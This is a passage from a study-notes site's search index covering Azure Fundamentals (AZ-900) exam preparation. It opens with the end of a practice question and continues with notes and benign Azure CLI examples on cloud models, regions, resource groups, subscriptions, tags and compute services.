                             • Wait for a follow-up email from Microsoft Support before taking any action.
                             • Ignore the alert, as Microsoft Defender for Cloud will automatically handle any threats.
                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-85-which-of-the-following-resources-can-be-managed-using-azure-arc","title":"Question 85:\u00a0Which of the following resources can be managed using Azure Arc?","text":"
                            • Only Kubernetes Clusters and Virtual\u00a0Machines
                            • All of these
                            • Kubernetes clusters
                            • Only Windows and Linux Servers &\u00a0Virtual Machines
                            • Virtual machines
                            • Windows Server and Linux servers

                             The answer is All of these. Azure Arc enables you to manage resources both on-premises and across multiple clouds using a single control plane. This includes managing Windows Server and Linux servers, Kubernetes clusters, and virtual machines. By extending Azure services to hybrid environments, Azure Arc provides consistent management, security, and compliance across all resources.

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-preparation/","title":"AZ-900: Notes to get through the Azure Fundamentals Certificate","text":"

                            The following notes are derived from the Microsoft e-learning platform. They may not be entirely original, as I've included some paragraphs directly from the Microsoft e-learning platform and some other sources. However, what makes this repository particularly valuable is my effort to enrich and curate the content, along with the addition of valuable tips that can assist anyone in passing the exam.

                            • Notes taken in: September 2023.
                             • Certification accomplished on: 23 September 2023.
                            • Practice tests: Practice tests from different sources.

                             Sources for these notes:

                            • The Microsoft e-learn platform.
                            • Book: \"Microsoft Certified - Azure Fundamentals. Study guide\", by Jim Boyce.
                            • Udemy course: AZ-900 Bootcamp: Microsoft Azure Fundamentals.
                            • Udemy course: AZ-900 Microsoft Azure Fundamentals Practice Tests, Sep 2023
                            • Linkedin course: Exam tips: Microsoft Azure Fundamentals (AZ-900)
                            Labs and resources
                            • All labs.
                            • Deploy a file share in Microsoft Azure
                            • Deploy a virtual network in Microsoft Azure
                             • [Provision a resource group in Azure](https://labitpro.com/provision-a-resource-group-in-azure/)
                            • Deploy and configure an Azure Virtual Machine
                            • Deploy and configure an Azure Storage Account
                            • Deploy and configure a network security group
                             • [Deploy and configure Azure Bastion](https://labitpro.com/deploy-and-configure-azure-bastion/)
                            • Add a Custom Domain to Azure AD
                            • Create Users and Groups in Azure AD
                            • Configure Self-Service Password Reset in Azure AD
                            • Create and Configure an Azure Storage Account
                            • Manage Azure Storage Account Access Keys
                            • Create an Azure File Share
                            • Create and Attach a VM Data Disk
                            • Resize an Azure Virtual Machine
                            • Create a VM Scale Set in Azure
                            • Configure vNet Peering
                            • Create and Configure an Azure Recovery Services Vault
                            • Managing Users and Groups in Azure AD
                            • Practice with a mock exam.
                            • AZ-900 crossword puzzle
                            • Flashcards
                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#basic-cloud-computing-concepts","title":"Basic Cloud Computing concepts","text":"","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#shared-responsability-model","title":"Shared responsability model","text":"

                             IaaS, PaaS, and SaaS are often referred to as the cloud computing stack because, essentially, each is built on top of the one below it.

                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#cloud-models","title":"Cloud models","text":"","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#public-cloud","title":"Public cloud","text":"

                            In a public cloud deployment, services are offered over the public internet. These services are available to customers who wish to purchase them. The cloud resources, like servers and storage, are owned and operated by the cloud service provider.

                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#private-cloud","title":"Private cloud","text":"

                            In a private cloud, compute resources are accessed exclusively by users from a single business or organization. You can host a private cloud physically in your own on-prem datacenter, or it can be hosted by a third-party cloud service provider.

                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#hybrid-cloud","title":"Hybrid cloud","text":"

                            A hybrid cloud is a complex computing environment. It combines a public cloud and a private cloud by allowing data and applications to be shared between them. This type of cloud deployment is often utilized by large organizations.

                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#consumption-based-model","title":"Consumption-Based Model","text":"

                            The consumption-based model refers to the way in which organizations only pay for the resources they use. The consumption-based model offers the following benefits:

                            • No upfront costs
                            • No need to purchase or manage infrastructure
                            • Customer pays for resources only when they are needed
                            • Customer can stop paying for resources that are no longer needed
                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#benefits-of-cloud-computing","title":"Benefits of Cloud Computing","text":"

                            Cloud computing offers several key advantages over a physical environment:

                            • High availability: Cloud-based apps can provide a continuous user experience with virtually no downtime.
                            • Scalability: Apps in the cloud can scale vertically and horizontally. When scaling vertically, compute capacity is added by adding RAM or CPUs to a virtual machine. When scaling horizontally, compute capacity is increased by adding instances of resources, such as adding VMs to a configuration.
                            • Elasticity: Allows you to configure apps to autoscale so they always have the resources they need.
                            • Agility: Deploy and configure cloud-based resources quickly as requirements change.
                            • Geo-distribution: Deploy apps to regional datacenters so that customers always have the best performance in their specific region.
                            • Disaster recovery: Cloud-based backup services, data replication, and geo-distribution allow you to deploy apps and know that their data is safe in the event of disaster.
                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#capital-expenses-vs-operating-expenses","title":"Capital Expenses vs. Operating Expenses","text":"

                            Organizations have to think about two different types of expenses:

                            • Capital Expenditure (CapEx): The spending of money up-front on physical infrastructure. These expenses are deducted over time.
                            • Operational Expenditure (OpEx): The spending of money on services or products now and being billed for them now. These expenses are deducted in the same year they are incurred. Most cloud services are considered OpEx.
                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#the-cloud-computing-stack","title":"The Cloud Computing stack","text":"

                            Before delving deeper, I would like to share this highly informative chart depicting Azure services and their position within the cloud computing stack.

                            After this, let's start with the stack!

                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#infrastructure-as-a-service-iaas","title":"Infrastructure-as-a-Service (IaaS)","text":"

                            Migrating to IaaS helps reduce the need for maintenance of on-prem data centers and allows organizations to save money on hardware costs. IaaS solutions allow organizations to scale their IT resources up and down with demand, while also allowing them to quickly provision new applications and increase the reliability of their underlying infrastructure.

                            1. One common business scenario and use case for IaaS is Lift-and-Shift Migration:

                             • Migrate apps and workloads to the cloud.
                             • Increase scale and performance.
                             • Enhance security.
                             • Reduce cost without refactoring the application.

                            2. Another common use case is Storage, backup, and recovery:

                             • Avoid capital outlay for storage and the complexity of storage management.
                             • IaaS is useful for handling unpredictable demand and steadily growing storage needs.
                             • Simplify planning and management of backup and recovery.

                             3. Web apps: IaaS provides all the infrastructure needed to support web apps, including storage, web and application servers, and networking resources. The infrastructure is quickly deployable and easily scaled up and down.

                             4. High-performance computing.

                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#platform-as-a-service-paas","title":"Platform-as-a-Service (PaaS)","text":"

                             Basically, PaaS is a complete development and deployment environment in the cloud. It includes servers, storage, networking, middleware, development tools, BI services, database management systems, and more. PaaS supports the complete web application lifecycle: you manage the applications and services, and the service provider manages everything else.

                             Platform-as-a-Service is a complete development and deployment environment in the cloud. It can be used to deploy simple cloud-based apps and complex cloud-enabled enterprise applications. When leveraging PaaS, you purchase the resources you need from your cloud service provider on a pay-as-you-go basis. The resources you purchase are accessed over a secure Internet connection.

                            PaaS resources include the same resources included in IaaS (servers, storage, and networking) PLUS things like middleware, development tools, business intelligence services, and database management systems.

                             It\u2019s important to remember that PaaS is designed to support the complete web application lifecycle. It allows organizations to avoid the expense of buying and managing software licenses, underlying infrastructure and middleware, container orchestrators, and development tools.

                            Ultimately, when leveraging PaaS offerings, you manage the applications and services, while the cloud service provider manages everything else.

                             1. One common business scenario and use case for PaaS is a development framework: a framework, provided by Azure, that developers can use to develop or customize cloud-based applications.

                            2. Analytics and BI: tools provided as a service with PaaS.

                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#software-as-a-service-saas","title":"Software-as-a-Service (SaaS)","text":"

                            Software-as-a-Service allows users to connect to cloud-based apps over the Internet. Microsoft Office 365 is a good example of SaaS in action. Gmail would be another good example. SaaS provides a complete software solution that\u2019s purchased on a pay-as-you-go basis from a cloud service provider. It\u2019s essentially the rental of an app, that users can then connect to over the Internet, via a web browser. The underlying infrastructure, middleware, app software, and app data for a SaaS solution are all hosted in the provider\u2019s data center, which means the service provider is responsible for managing the hardware and software. SaaS allows organizations to get up and running quickly, with minimal upfront cost.

                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#architectural-components","title":"Architectural components","text":"

                            The core architectural components of Azure may be broken down into two main groupings: the physical infrastructure, and the management infrastructure.

                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#physical-infrastructure","title":"Physical infrastructure","text":"

                             The physical infrastructure for Azure starts with datacenters. Conceptually, the datacenters are the same as large corporate datacenters. They\u2019re facilities with resources arranged in racks, with dedicated power, cooling, and networking infrastructure. Individual datacenters aren\u2019t directly accessible. Datacenters are grouped into Azure regions or Azure availability zones.

                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-region","title":"Azure Region","text":"

                            A region is a geographical area that contains at least one (but potentially multiple) datacenters that are networked together with a low-latency network.

                             Every Azure region is paired with another region within the same geography (e.g., US, Europe, or Asia) at least 300 miles away, which allows resources to be replicated across that geography. Replicating resources across region pairs reduces the chance that a single event, such as a natural disaster, civil unrest, a power outage, or a physical network outage, affects both regions at once.

                             Some services or features are only available in certain regions. Others don't require you to select a specific region; for instance: Azure Active Directory, Azure Traffic Manager, and Azure DNS.

                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#availability-zones","title":"Availability zones","text":"

                             Availability zones are physically separate datacenters within an Azure region. Each availability zone is made up of one or more datacenters equipped with independent power, cooling, and networking. In essence, an availability zone is designed to be an isolation boundary: if one zone goes down, the others continue working.

                            Availability zones are designed primarily for VMs, managed disks, load balancers, and SQL databases. It is important to remember that availability zones are connected through private high-speed fiber-optic networks. The image below shows what availability zones look like within a region:

                            To ensure resiliency, a minimum of three separate availability zones are present in all availability zone-enabled regions. However, not all Azure Regions currently support availability zones.

                            Azure services that support availability zones fall into three categories:

                            • Zonal services: You pin the resource to a specific zone (for example, VMs, managed disks, IP addresses).
                            • Zone-redundant services: The platform replicates automatically across zones (for example, zone-redundant storage, SQL Database).
                            • Non-regional services: Services are always available from Azure geographies and are resilient to zone-wide outages as well as region-wide outages.
                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#region-pairs","title":"Region pairs","text":"

                            Each Azure region is paired with another region within the same geography at least 300 miles away. This is done to allow for the replication of resources across a geography and reduce the chance of unavailability. West US region is, for instance, paired with East US.

                             If an outage occurs, one region out of every pair is prioritized to make sure that at least one is restored as quickly as possible and to minimize downtime. Data continues to reside within the same geography as its pair (except for Brazil South) for tax and law enforcement jurisdiction purposes.

                             Most regions are paired in two directions, meaning they are the backup for the region that provides a backup for them (West US and East US back each other up). However, some regions, such as West India and Brazil South, are paired in only one direction: the secondary region does not rely on its primary in return. For example, West India\u2019s secondary region is South India, but South India\u2019s secondary region is Central India, not West India. Brazil South is unique because it\u2019s paired with a region outside of its geography: its secondary region is South Central US, while the secondary region of South Central US isn\u2019t Brazil South.

                            Sovereign regions

                             In addition to regular regions, Azure also has sovereign regions. Sovereign regions are instances of Azure that are isolated from the main instance of Azure. You may need to use a sovereign region for compliance or legal purposes. Azure sovereign regions include:

                             • US DoD Central, US Gov Virginia, US Gov Iowa, and more: physical and logical network-isolated instances of Azure for U.S. government agencies and partners. These datacenters are operated by screened U.S. personnel and include additional compliance certifications.
                             • China East, China North, and more: available through a unique partnership between Microsoft and 21Vianet, whereby Microsoft doesn't directly maintain the datacenters.

                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#management-infrastructure","title":"Management infrastructure","text":"","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-resources-and-resource-groups","title":"Azure Resources and Resource Groups","text":"

                            A resource is the basic building block of Azure. Anything you create, provision, deploy, etc. is a resource. Virtual Machines (VMs), virtual networks, databases, cognitive services, etc. are all considered resources within Azure.

                            Resource groups are simply groupings of resources. When you create a resource, you\u2019re required to place it into a resource group. While a resource group can contain many resources, a single resource can only be in one resource group at a time. Some resources may be moved between resource groups, but when you move a resource to a new group, it will no longer be associated with the former group. Additionally, resource groups can't be nested, meaning you can\u2019t put resource group B inside of resource group A.

                             If you grant or deny access to a resource group, you\u2019ve granted or denied access to all the resources within it. When you delete a resource group, all the resources it contains are deleted too, so it makes sense to organize your resource groups by similar lifecycle or by function.

                            A resource group can be used to scope access control for administrative actions. To manage a resource group, you can assign\u00a0Azure Policies,\u00a0Azure roles, or\u00a0resource locks.

                            You can\u00a0apply tags\u00a0to a resource group. The resources in the resource group don't inherit those tags.

                            You can deploy up to 800 instances of a resource type in each resource group. Some resource types are\u00a0exempt from the 800 instance limit. For more information, see\u00a0resource group limits.

                            When you create a resource group, you need to provide a location for that resource group. You may be wondering, \"Why does a resource group need a location? And, if the resources can have different locations than the resource group, why does the resource group location matter at all?\". The resource group stores metadata about the resources. When you specify a location for the resource group, you're specifying where that metadata is stored. For compliance reasons, you may need to ensure that your data is stored in a particular region. If a resource group's region is temporarily unavailable, you can't update resources in the resource group because the metadata is unavailable.
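
                             To make this concrete, here is a minimal Azure CLI sketch of the resource group lifecycle (the group name, location, and lock name are example values I made up, not part of the official material):

                             ```bash
                             # Create a resource group; every resource you deploy must land in one
                             az group create --name demo-rg --location eastus

                             # Scope administration: a CanNotDelete lock protects the whole group
                             az lock create --name no-delete --lock-type CanNotDelete --resource-group demo-rg

                             # Deleting the group deletes every resource inside it (remove the lock first)
                             az lock delete --name no-delete --resource-group demo-rg
                             az group delete --name demo-rg
                             ```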

                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-subscription","title":"Azure Subscription","text":"

                            An Azure subscription provides authenticated and authorized access to Azure products and services and allows organizations to provision cloud resources. Every Azure subscription links to an Azure account.

                            In Azure, subscriptions are a unit of management, billing, and scale.

                            An account can have multiple subscriptions, but it\u2019s only required to have one. In a multi-subscription account, you can use the subscriptions to configure different billing models and apply different access-management policies.

                            You can use Azure subscriptions to define boundaries around Azure products, services, and resources. There are two types of subscription boundaries that you can use:

                            • Billing boundary: This subscription type determines how an Azure account is billed for using Azure. You can create multiple subscriptions for different types of billing requirements. Azure generates separate billing reports and invoices for each subscription so that you can organize and manage costs.
                             • Access control boundary: Azure applies access-management policies at the subscription level, and you can create separate subscriptions to reflect different organizational structures. An example is that within a business, you have different departments to which you apply distinct Azure subscription policies. This design allows you to manage and control access to the resources that users provision with specific subscriptions.

                            Use cases for creating additional subscriptions:

                            • To separate Environments: separate environments for development and testing, security, or to isolate data for compliance reasons. This design is particularly useful because resource access control occurs at the subscription level.
                            • To separate Organizational structures: you could limit one team to lower-cost resources, while allowing the IT department a full range. This design allows you to manage and control access to the resources that users provision within each subscription.
                            • To separate Billing: For instance, you might want to create one subscription for your production workloads and another subscription for your development and testing workloads.

                             After you've created an Azure account, you're free to create additional subscriptions. After you've created an Azure subscription, you can start creating Azure resources within each subscription.

                            You can have up to 2000 role assignments in each subscription.

                             An Azure subscription has a trust relationship with Azure Active Directory (Azure AD): a subscription trusts Azure AD to authenticate users, services, and devices. Multiple subscriptions can trust the same Azure AD directory, but each subscription can only trust a single directory; a subscription cannot trust multiple directories.
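
                             As a quick illustration of subscriptions as a management boundary, this Azure CLI sketch lists and switches the active subscription (the subscription name is a placeholder):

                             ```bash
                             # Show every subscription the signed-in account can access
                             az account list --output table

                             # Switch the active subscription by name or ID (placeholder value)
                             az account set --subscription "Development-Subscription"

                             # Confirm which subscription subsequent commands will target
                             az account show --query name
                             ```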

                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#management-groups-in-azure","title":"Management Groups in Azure","text":"

                            To efficiently manage access, policies (like available regions), and compliance when you manage multiple Azure subscriptions, you can use Management Groups, because management groups provide scope that sits above subscriptions.

                            When managing multiple subscriptions, you organize those subscriptions into containers called management groups, to which you can then apply governance conditions. All subscriptions within a management group will, in turn, inherit the conditions you apply to the management group.

                            All subscriptions within a single management group must trust the same Azure AD tenant.

                            The image below highlights how you can create a hierarchy for governance through the use of management groups:

                            Some examples of how you could use management groups might be:

                            • Create a hierarchy that applies a policy.
                            • Provide user access to multiple subscriptions.

                            Facts we need to know:

                            • Maximum of 10,000 management groups supported in a single directory.
                             • A management group tree can support up to six levels of depth (root and subscription level not included).
                            • Each management group and subscription can support only one parent.
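
                             A minimal sketch of building such a hierarchy with the Azure CLI (the group names and the subscription ID are placeholders):

                             ```bash
                             # Root-level management group
                             az account management-group create --name demo-mg --display-name "Demo Platform"

                             # A child group nested under it (up to six levels of depth are supported)
                             az account management-group create --name demo-mg-dev --parent demo-mg

                             # Move a subscription under the child group so it inherits its policies
                             az account management-group subscription add --name demo-mg-dev --subscription <subscription-id>
                             ```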
                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#tags","title":"Tags","text":"

                            One way to organize related resources is to place them in their own subscriptions. You can also use resource groups to manage related resources. Resource tags are another way to organize resources. Tags provide extra information, or metadata, about your resources. A resource tag consists of a name and a value. You can assign one or more tags to each Azure resource. Keep in mind that you don't need to enforce that a specific tag is present on all of your resources.

                             | Name | Value |
                             | --- | --- |
                             | AppName | The name of the application that the resource is part of. |
                             | CostCenter | The internal cost center code. |
                             | Owner | The name of the business owner who's responsible for the resource. |
                             | Environment | An environment name, such as \"Prod,\" \"Dev,\" or \"Test.\" |
                             | Impact | How important the resource is to business operations, such as \"Mission-critical,\" \"High-impact,\" or \"Low-impact.\" |

                            How do I manage resource tags?

                            You can add, modify, or delete resource tags through Windows PowerShell, the Azure CLI, Azure Resource Manager templates, the REST API, or the Azure portal.

                            You can also use Azure Policy to enforce tagging rules and conventions.
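
                             For example, tagging from the Azure CLI might look like this (tag names, values, and resource IDs are illustrative):

                             ```bash
                             # Tag a resource group; resources inside it will NOT inherit these tags
                             az group update --name demo-rg --set tags.Environment=Dev tags.Owner=ops

                             # Tag an individual resource by its resource ID
                             az resource tag --tags Environment=Dev CostCenter=1234 \
                                 --ids /subscriptions/<sub-id>/resourceGroups/demo-rg/providers/Microsoft.Web/sites/demo-app
                             ```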

                            Resources don't inherit tags from subscriptions and resource groups, meaning that you can apply tags at one level and not have those tags automatically show up at a different level, allowing you to create custom tagging schemas that change depending on the level (resource, resource group, subscription, and so on).

                            Limitations to tags:

                             • Not all resource types support tags.
                             • Maximum of 50 tags for resource groups and resources.
                               • Tag name length: 512 characters.
                               • Tag value length: 256 characters.
                             • Maximum of 15 tags for storage accounts.
                               • Tag name length: 128 characters.
                               • Tag value length: 256 characters.
                             • VMs and VM scale sets: the total set of tags is limited to 2,048 characters.
                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-compute-services-and-products","title":"Azure Compute services and products","text":"

                            Azure compute is an on-demand computing service that organizations use to run cloud-based applications. It provides compute resources like disks, processors, memory, networking, and even operating systems. Azure supports many types of compute solutions, including Linux, Windows Server, SQL Server, Oracle, IBM, and SAP. Each Azure compute service offers different options depending on your requirements. The most common Azure compute services are:

                            1. Azure Virtual Machines

                              • VM Scale Sets
                              • VM Availability Sets
                            2. Azure Virtual Desktop

                            3. Azure Container Instances

                            4. Azure Functions (serverless computing)

                            5. Azure Logic Apps (serverless computing)

                            6. Azure App Service

                            7. Azure Virtual Networking

                            8. Azure Virtual Private Networks

                            9. Azure ExpressRoute

                            10. Azure DNS

                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#1-azure-virtual-machines","title":"1. Azure Virtual Machines","text":"

                            Virtual machines are virtual versions of physical computers that feature virtual processors, memory, storage, and networking resources. They host an operating system just like a physical computer, and you can install and run software on them just like a physical computer.

                             VMs provide IaaS. They are ideal when you need total control over the operating system and environment, for example when running in-house or customized software.

                            SLA for Virtual Machines

                            • For all Virtual Machines that have two or more instances deployed across two or more Availability Zones in the same Azure region, we guarantee you will have Virtual Machine Connectivity to at least one instance at least 99.99% of the time.

                            • For all Virtual Machines that have two or more instances deployed in the same Availability Set or in the same Dedicated Host Group, we guarantee you will have Virtual Machine Connectivity to at least one instance at least 99.95% of the time.

                            • For any Single Instance Virtual Machine using Premium SSD or Ultra Disk for all Operating System Disks and Data Disks, we guarantee you will have Virtual Machine Connectivity of at least 99.9%.

                            • For any Single Instance Virtual Machine using Standard SSD Managed Disks for Operating System Disk and Data Disks, we guarantee you will have Virtual Machine Connectivity of at least 99.5%.

                            • For any Single Instance Virtual Machine using Standard HDD Managed Disks for Operating System Disks and Data Disks, we guarantee you will have Virtual Machine Connectivity of at least 95%.
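
                             To reach the 99.99% tier described above, you deploy two or more instances across two or more availability zones. A minimal Azure CLI sketch (names, image alias, and zones are example values):

                             ```bash
                             # Two VMs pinned to different availability zones in the same region
                             az vm create --resource-group demo-rg --name demo-vm-1 --image Ubuntu2204 \
                                 --zone 1 --admin-username azureuser --generate-ssh-keys
                             az vm create --resource-group demo-rg --name demo-vm-2 --image Ubuntu2204 \
                                 --zone 2 --admin-username azureuser --generate-ssh-keys
                             ```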

                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#virtual-machine-scale-sets","title":"Virtual Machine Scale Sets","text":"

                            Azure can also manage the grouping of VMs for you with features such as scale sets and availability sets. A virtual machine scale set allows you to deploy and manage a set of identical VMs that you can use to deploy solutions with true autoscale. As demand increases, VM instances can be added.
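
                             A sketch of a scale set with an autoscale profile attached (all names and counts are example values):

                             ```bash
                             # Scale set starting with 2 identical Ubuntu instances
                             az vmss create --resource-group demo-rg --name demo-vmss --image Ubuntu2204 \
                                 --instance-count 2 --admin-username azureuser --generate-ssh-keys

                             # Autoscale between 2 and 5 instances as demand changes
                             az monitor autoscale create --resource-group demo-rg --name demo-autoscale \
                                 --resource demo-vmss --resource-type Microsoft.Compute/virtualMachineScaleSets \
                                 --min-count 2 --max-count 5 --count 2
                             ```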

                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#virtual-machine-availability-sets","title":"Virtual machine availability sets","text":"

                             Virtual machine availability sets are another tool to ensure that VMs stagger updates and have varied power and network connectivity, preventing you from losing all your VMs to a single network or power failure.

                            Availability sets do this by grouping VMs in two ways: update domain and fault domain.

                            • Update domain: The update domain groups VMs that can be rebooted at the same time.
                            • Fault domain: The fault domain groups your VMs by common power source and network switch. By default, an availability set will split your VMs across up to three fault domains. This helps protect against a physical power or networking failure by having VMs in different fault domains.

                            There\u2019s no additional cost for configuring an availability set. You only pay for the VM instances you create.
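
                             A minimal sketch of creating an availability set and placing a VM in it (names and domain counts are example values):

                             ```bash
                             # Availability set with 3 fault domains and 5 update domains
                             az vm availability-set create --resource-group demo-rg --name demo-avset \
                                 --platform-fault-domain-count 3 --platform-update-domain-count 5

                             # The VM must reference the set when it is created; it can't be moved in later
                             az vm create --resource-group demo-rg --name demo-vm --image Ubuntu2204 \
                                 --availability-set demo-avset --admin-username azureuser --generate-ssh-keys
                             ```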

                             When to use VMs: during testing and development, when running applications in the cloud, when extending your datacenter to the cloud, and during disaster recovery.

                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#2-azure-virtual-desktop","title":"2. Azure Virtual Desktop","text":"

                            Azure Virtual Desktop is a desktop and application virtualization service that runs on the cloud. It enables you to use a cloud-hosted version of Windows from any location. Azure Virtual Desktop provides centralized security management for users' desktops with Azure Active Directory (Azure AD). You can enable multifactor authentication to secure user sign-ins. You can also secure access to data by assigning granular role-based access controls (RBACs) to users. With Azure Virtual Desktop, the data and apps are separated from the local hardware. The actual desktop and apps are running in the cloud, meaning the risk of confidential data being left on a personal device is reduced. Azure Virtual Desktop lets you use Windows 10 or Windows 11 Enterprise multi-session, the only Windows client-based operating system that enables multiple concurrent users on a single VM.

                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#3-azure-container-instances","title":"3. Azure Container Instances","text":"

                            Much like running multiple virtual machines on a single physical host, you can run multiple containers on a single physical or virtual host. Virtual machines appear to be an instance of an operating system that you can connect to and manage.

                            VM vs Containers

                             VMs virtualize the hardware, emulating a computer. Containers virtualize the operating system. Unlike virtual machines, you don't manage the operating system for a container; containers are a virtualization environment. If you need complete control, use a VM. On the other hand, containers prioritize portability and performance.

                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-container-instances-aci","title":"Azure Container Instances (ACI)","text":"

                             Azure Container Instances offer the fastest and simplest way to run a container in Azure, without having to manage any virtual machines or adopt any additional services. Azure Container Instances are a platform as a service (PaaS) offering. Azure Container Instances allow you to upload your containers, and then the service runs the containers for you.
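
                             For instance, running Microsoft's public hello-world sample image as a container instance (the resource names and DNS label are placeholders):

                             ```bash
                             # One command, no VMs to manage; the image is a public Microsoft sample
                             az container create --resource-group demo-rg --name demo-aci \
                                 --image mcr.microsoft.com/azuredocs/aci-helloworld \
                                 --ports 80 --dns-name-label demo-aci-example

                             # Grab the public FQDN and current state
                             az container show --resource-group demo-rg --name demo-aci \
                                 --query "{fqdn:ipAddress.fqdn,state:instanceView.state}" --output table
                             ```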

                            Azure Container Instances ACI versus Azure Kubernetes service AKS

                            For many organizations, containers have become the preferred way to package, deploy, and manage cloud apps.

                            • Azure Container Instances (ACI) is the easiest way to run a container in Azure, without the need for any VMs or other infrastructure. You can use docker images.
                            • However, if you require full container orchestration, Microsoft recommends Azure Kubernetes Service (AKS).
                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-container-apps","title":"Azure Container Apps","text":"

                            Azure Container Apps are similar in many ways to a container instance. They allow you to get up and running right away, they remove the container management piece, and they're a PaaS offering. Container Apps have extra benefits such as the ability to incorporate load balancing and scaling. These other functions allow you to be more elastic in your design.

                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-kubernetes-service-aks","title":"Azure Kubernetes Service (AKS)","text":"

                            Azure Kubernetes Service (AKS) is a container orchestration service. An orchestration service manages the lifecycle of containers. When you're deploying a fleet of containers, AKS can make fleet management simpler and more efficient.

                            AKS simplifies the deployment of a managed Kubernetes cluster in Azure by offloading the operational overhead to Azure. Since it\u2019s hosted, Azure handles the health monitoring and maintenance. The Kubernetes masters are managed by Azure, and you manage and maintain the agent nodes.

                            It\u2019s important to note that AKS itself is free. You pay only for the agent nodes within your clusters, not for the masters.

                            You can deploy an AKS cluster using Azure CLI, Azure Portal, Azure Powershell, and Template-driven deployment options (ARM templates, bicep, terraform).
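
                             A minimal CLI-driven deployment, with example names (the node count and everything else here is illustrative):

                             ```bash
                             # Managed cluster: Azure runs the control plane, you pay for the 2 agent nodes
                             az aks create --resource-group demo-rg --name demo-aks \
                                 --node-count 2 --generate-ssh-keys

                             # Merge credentials into ~/.kube/config and verify the agent nodes
                             az aks get-credentials --resource-group demo-rg --name demo-aks
                             kubectl get nodes
                             ```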

                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#4-azure-functions-serverless-computing","title":"4. Azure Functions (serverless computing)","text":"

                            Functions are a serverless technology that are best used in cases where you're concerned only about the code running your service and not the underlying platform or infrastructure.

                            Azure Functions is an event-driven, serverless compute option that doesn\u2019t require maintaining virtual machines or containers. If you build an app using VMs or containers, those resources have to be \u201crunning\u201d in order for your app to function. With Azure Functions, an event wakes the function, alleviating the need to keep resources provisioned when there are no events.

                             Benefits:

                             • No infrastructure management: as a business, you don't have to focus on administrative tasks.
                             • Scalability.
                             • You only pay for what you use. Price is based on consumption: number of executions plus running time for each.

                            Functions are commonly used when you need to perform work in response to an event (often via a REST request), timer, or message from another Azure service. Azure Functions runs your code when it's triggered and automatically deallocates resources when the function is finished. In this model, you're only charged for the CPU time used while your function runs. Functions can be either stateless or stateful. When they're stateless (the default), they behave as if they're restarted every time they respond to an event. When they're stateful (called Durable Functions), a context is passed through the function to track prior activity.

                             Generally, Azure Functions is stateless, but you can use an extension called Durable Functions to chain functions together and maintain their state while they execute.
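
                             A sketch of provisioning a Function app on the Consumption plan (the storage account and app names are placeholders and must be globally unique):

                             ```bash
                             # Every Function app needs a storage account behind it
                             az storage account create --name demofuncstorage123 --resource-group demo-rg \
                                 --location eastus --sku Standard_LRS

                             # Consumption plan: billed per execution + running time, scales to zero
                             az functionapp create --resource-group demo-rg --name demo-func-app \
                                 --storage-account demofuncstorage123 --consumption-plan-location eastus \
                                 --runtime python --functions-version 4 --os-type Linux
                             ```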

                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#5-azure-logic-apps-serverless-computing","title":"5. Azure Logic Apps (serverless computing)","text":"

                            When you need something more complex than Functions, like a workflow or a process, Azure Logic Apps is a good solution. It enables you to create no-code and low-code solutions hosted in Azure to automate and orchestrate tasks, business processes, and workflows.

                            Implementation can be done using a web-based design environment. You build the app by connecting triggers to actions with various connections.

                            Price based on consumption: number of executions + type of connections that the app uses.

                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#6-azure-app-service","title":"6. Azure App Service","text":"

